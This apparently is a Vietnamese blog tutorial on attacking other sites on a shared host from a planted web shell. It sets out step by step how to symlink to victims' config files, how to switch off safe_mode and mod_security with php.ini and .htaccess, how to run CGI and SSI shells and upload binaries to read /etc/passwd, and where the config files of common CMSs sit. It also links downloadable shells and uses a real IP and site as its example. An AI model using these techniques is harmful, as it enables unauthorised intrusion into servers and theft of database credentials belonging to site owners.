Symlink

1. Symlink là gì ?
Mọi người có thể hiểu như thế này symlink là tạo 1 file (thư mục) ánh xạ tới một file (thư mục) khác.
Hay nói đơn giản và dễ hiểu hơn nó tương tự như shortcut trên window :)

2. Vậy symlink để làm gì ?

Mục đich của symlink là xem file config của victim trong local attack trong trường hợp dir, cat không sử dụng được

3. Công cụ cần thiết
Rất đơn giản là 1 con shell trên 1 site nào đó cùng server với victim :)

4. Cách symlink
Ở đây mình sẽ phân ra hai trường hợp:

a. Safe mod = off
Trường hợp này bạn chỉ cần 1 con shell có thể run được lệnh, mình thường dùng shell r57 :D

Câu lệnh symlink:

ln -s /path/config.php 1.txt

path: đường dẫn đến file config của victim
config.php là file config của victim

b. Safe mod = on
Trường hợp này ta có thể tìm cách bypass để hạ về off
Các bạn có thể tạo file php.ini ngang hàng con shell với nội dung sau:

safe_mode = OFF
disable_functions = NONE

Ngoài ra có thể dùng tính năng bypass có sẵn trên shell

Một số cách pypass khác

- Bypass mod security bằng htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

- htaccess hỗ trợ symlink root

Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php

Trường hợp không pypass được thì ta cần sử dụng shell CGI đặc điểm của con shell này là có thể run lệnh ngay khi safe mod = on Để chạy được shell cgi các bạn tạo file htaccess ngang hàng con shell với nội dung sau:

RewriteEngine On
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^(.*)$ http://google.com.vn#$1 [R=301,L]

<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterSanPOST Off
</IfModule>
Options +ExecCGI
AddHandler cgi-script cgi pl noob vl dcm bmp db file kid was h4 cbg
Options +FollowSymLinks +Indexes
DirectoryIndex noob.html

Trong này có cả pypass mod security luôn nhóe :))
Rồi giờ chmod con shell cgi về 0755 và run shell và chạy lệnh symlink thôi
Tuy nhiên một số trường hợp đã có htaccess mà vẫn không run được thì các bạn đừng ngạc nhiên vì đơn giản server đó không cho chạy cgi =))

* Sau khi symlink nếu đọc file txt bị báo lỗi 403 thì các bạn tạo file htaccess ngang hàng file txt đó với nội dung như sau thì sẽ đọc được

Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php

* Đường dẫn file config của một số mã nguồn (Nếu thèng ad nó chưa đổi :D )

Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php

Trên đây chỉ là cách symlink đơn giản còn trên thực tế thì rất chi là muôn hình vạn trạng các bạn có thể google để tìm hiểu thêm nhóe :D

===============================

SSI

Tiếp theo mình sẽ giới thiếu tới các bạn con shell ssi. Trong trường hợp dir, cat... cgi không dùng được thì bạn có thể dùng shell ssi để run lệnh :D
Để biết server đó có có chạy được ssi hay không thì các bạn chạy như sau

ip/~user/path/ssi.shtml

ip: địa chỉ IP của server
user: user của site chứa con shell
path: đường dẫn đến con shell
ssi.shtml: shell ssi

ví dụ trên server 141.101.116.63 mình có con shell nằm trong thư mục upload của site thegioingam.org và site này có user là thegioingam thì sẽ run như sau

141.101.116.63/~thegioingam/upload/ssi.shtml

Nếu run được thì nó sẽ hiện ra con shell còn không thì bye bye =))

==============

Phương pháp thay thế​

1. Thay thế lệnh

Không biết gọi là gì nữa nên tạm gọi là như vậy =))
Đơn giản là như thế này các lệnh mà ta chạy nó được gọi ra từ thư mục bin ở root của server, vậy trong trường hợp không chạy được lệnh thì ta đừng dùng lệnh được gọi từ bin của server nữa mà hãy up lên các lệnh cần dùng cho riêng ta :))
Tuy nhiên không phải server nào cũng được nhé các bạn
Ở thư mục bin trong file đính kèm mình đã gộp sẵ 1 số file cần dùng các bạn chỉ việc up lên thôi
Chú ý là dùng lệnh nào thì up file lệnh đó lên ngang hàng con shell chứ không phải là up cả cái bin lên nhóe :)
1 số trường hợp không cho up file kiểu đó thì ta nén zip lại rồi up lên sao đó dùng lệnh unzip để giải nến
Sau khi up lên cần chmod 0755 mới chạy được nhé.
Lúc này cách chạy lênh của ta sẽ như sau
Ví dụ:
Bình thường ta chạy

cat /etc/passwd

Không hiện ra gì cả => ta up file cat của ta lên và chạy

./cat /etc/passwd

Nếu run được thì sẽ hiện ra list user còn không thì tức là server không cho phép hoặc là bạn chưa chmod file cat về 0755 =))

2. phpmyadmin
Đối với directadmin thì đường dẫn tới phpmyadmin sẽ là

http://domian.com/phpmyadmin

Tuy nhiên với những thằng không có hay phải vào control panel của host mới vô đc phpmyadmin thì sao ? Ta đã lấy được file config nhưng trong đó nó có ghi pass vào host đâu :( Ta có thể dùng chức năng connect mysql của con shell tuy nhiên không phải lúc nào nó cũng làm việc Vậy cách đơn giản nhất là ta quăng luôn 1 thư mục phpmyadmin lên và run nó thôi =)) phpmyadmin các ban google để tải nhóe

======================== 

Tổng hợp 1 số shell local:
Pass unrar:  quylevhb

SSI shell:  http://adf.ly/v11OX
File lệnh để thay:  http://adf.ly/vqEAs
Telnet:  http://adf.ly/vqEOZ
Shell cgi: http://adf.ly/vqEWt
Shell tổng hợp:  http://adf.ly/vqEZj
PHP Myadmin:  http://adf.ly/v134t

Đăng nhận xét Blogger

 
Top